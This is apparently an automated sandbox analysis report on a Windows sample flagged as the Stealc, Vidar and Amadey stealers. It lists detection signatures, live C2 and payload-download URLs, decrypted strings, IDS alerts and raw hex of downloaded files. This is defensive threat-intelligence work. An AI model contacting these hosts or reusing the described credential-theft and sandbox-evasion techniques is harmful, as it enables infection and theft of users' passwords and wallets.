Windows Analysis Report
Zachv5lCuu.exe

Overview

General Information

Sample name: Zachv5lCuu.exe
Renamed because the original name is a hash value.
Original sample name: 362aadbd9dc628c321bc33892046b8c1.exe
Analysis ID: 1464470
MD5: 362aadbd9dc628c321bc33892046b8c1
SHA1: f8831ff7c1fa70f4d56985b08daada57758c3171
SHA256: 11f5b01983cd221e28aa672906d313ca45dc0ed41f351602779590576104c52e
Tags: 32, exe, Stealc, trojan

Detection

Amadey, Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadeys stealer DLL
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Potentially malicious time measurement code found
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc.)
Tries to harvest and steal FTP login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Abnormally high CPU usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file name differs from the original file name gathered from version info
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls it for orders. Its main functionality is loading other payloads (called "tasks") onto all, or specifically targeted, computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions, desktop cryptocurrency wallet applications, and other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that grabs information on 2FA software and the Tor Browser.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: Zachv5lCuu.exe Avira: detected
Source: http://77.91.77.81/cost/go.exe Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exe Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exeOpera Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/mine/amadka.exeAm Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/ Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exephprefoxrefox Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/stealc/random.exe50673b5d7 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exe00 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.php Avira URL Cloud: Label: malware
Source: http://77.91.77.81/stealc/random.exe Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exe00 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dllv Avira URL Cloud: Label: malware
Source: http://85.28.47.4/20475a59bac849d.php7 Avira URL Cloud: Label: malware
Source: http://85.28.47.4 Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exe~ Avira URL Cloud: Label: phishing
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\amadka[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: 0000000D.00000002.1636866589.0000000001C3E000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
Source: explorti.exe.3232.11.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://77.91.77.82/Hun4Ko/index.php"]}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\amadka[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe ReversingLabs: Detection: 42%
Source: Zachv5lCuu.exe ReversingLabs: Detection: 55%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\amadka[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe Joe Sandbox ML: detected
Source: Zachv5lCuu.exe Joe Sandbox ML: detected
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetProcAddress
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: LoadLibraryA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: lstrcatA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: OpenEventA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: CreateEventA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: CloseHandle
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: Sleep
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: VirtualFree
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetSystemInfo
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: VirtualAlloc
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: HeapAlloc
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetComputerNameA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: lstrcpyA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetProcessHeap
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetCurrentProcess
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: lstrlenA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: ExitProcess
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetSystemTime
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: advapi32.dll
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: gdi32.dll
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: user32.dll
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: crypt32.dll
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: ntdll.dll
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetUserNameA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: CreateDCA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetDeviceCaps
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: ReleaseDC
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: sscanf
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: VMwareVMware
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: HAL9TH
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: JohnDoe
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: DISPLAY
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: %hu/%hu/%hu
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: http://85.28.47.4
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: /920475a59bac849d.php
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: /69934896f997d5bb/
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: default
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetFileAttributesA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GlobalLock
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: HeapFree
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetFileSize
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GlobalSize
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: IsWow64Process
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: Process32Next
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetLocalTime
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: FreeLibrary
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetVolumeInformationA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: Process32First
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetLocaleInfoA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetModuleFileNameA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: DeleteFileA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: FindNextFileA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: LocalFree
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: FindClose
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: LocalAlloc
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetFileSizeEx
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: ReadFile
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: SetFilePointer
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: WriteFile
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: CreateFileA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: FindFirstFileA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: CopyFileA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: VirtualProtect
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetLastError
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: lstrcpynA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: MultiByteToWideChar
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GlobalFree
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: WideCharToMultiByte
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GlobalAlloc
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: OpenProcess
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: TerminateProcess
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetCurrentProcessId
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: gdiplus.dll
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: ole32.dll
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: bcrypt.dll
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: wininet.dll
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: shlwapi.dll
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: shell32.dll
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: psapi.dll
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: rstrtmgr.dll
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: SelectObject
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: BitBlt
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: DeleteObject
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCB6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6CCB6C80
Source: Zachv5lCuu.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: Zachv5lCuu.exe, 00000000.00000002.1540779259.000000006CD1D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: Zachv5lCuu.exe, 00000000.00000002.1547785998.000000006CEDF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: Zachv5lCuu.exe, 00000000.00000002.1547785998.000000006CEDF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: Zachv5lCuu.exe, 00000000.00000002.1540779259.000000006CD1D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior

Networking

Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.7:49704 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.7:49704 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 85.28.47.4:80 -> 192.168.2.7:49704
Source: Traffic Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.7:49704 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 85.28.47.4:80 -> 192.168.2.7:49704
Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.7:49717 -> 77.91.77.82:80
Source: Traffic Snort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 77.91.77.82:80 -> 192.168.2.7:49717
Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.7:49719 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.7:49720 -> 77.91.77.82:80
Source: Malware configuration extractor URLs: http://85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor URLs: http://85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor IPs: 77.91.77.82
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK; Date: Fri, 28 Jun 2024 19:47:17 GMT; Server: Apache/2.4.41 (Ubuntu); Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT; ETag: "10e436-5e7eeebed8d80"; Accept-Ranges: bytes; Content-Length: 1106998; Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK; Date: Fri, 28 Jun 2024 19:47:21 GMT; Server: Apache/2.4.41 (Ubuntu); Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT; ETag: "a7550-5e7ebd4425100"; Accept-Ranges: bytes; Content-Length: 685392; Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK; Date: Fri, 28 Jun 2024 19:47:22 GMT; Server: Apache/2.4.41 (Ubuntu); Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT; ETag: "94750-5e7ebd4425100"; Accept-Ranges: bytes; Content-Length: 608080; Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK; Date: Fri, 28 Jun 2024 19:47:23 GMT; Server: Apache/2.4.41 (Ubuntu); Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT; ETag: "6dde8-5e7ebd4425100"; Accept-Ranges: bytes; Content-Length: 450024; Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK; Date: Fri, 28 Jun 2024 19:47:23 GMT; Server: Apache/2.4.41 (Ubuntu); Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT; ETag: "1f3950-5e7ebd4425100"; Accept-Ranges: bytes; Content-Length: 2046288; Content-Type: application/x-msdos-program
72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jun 2024 19:47:25 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
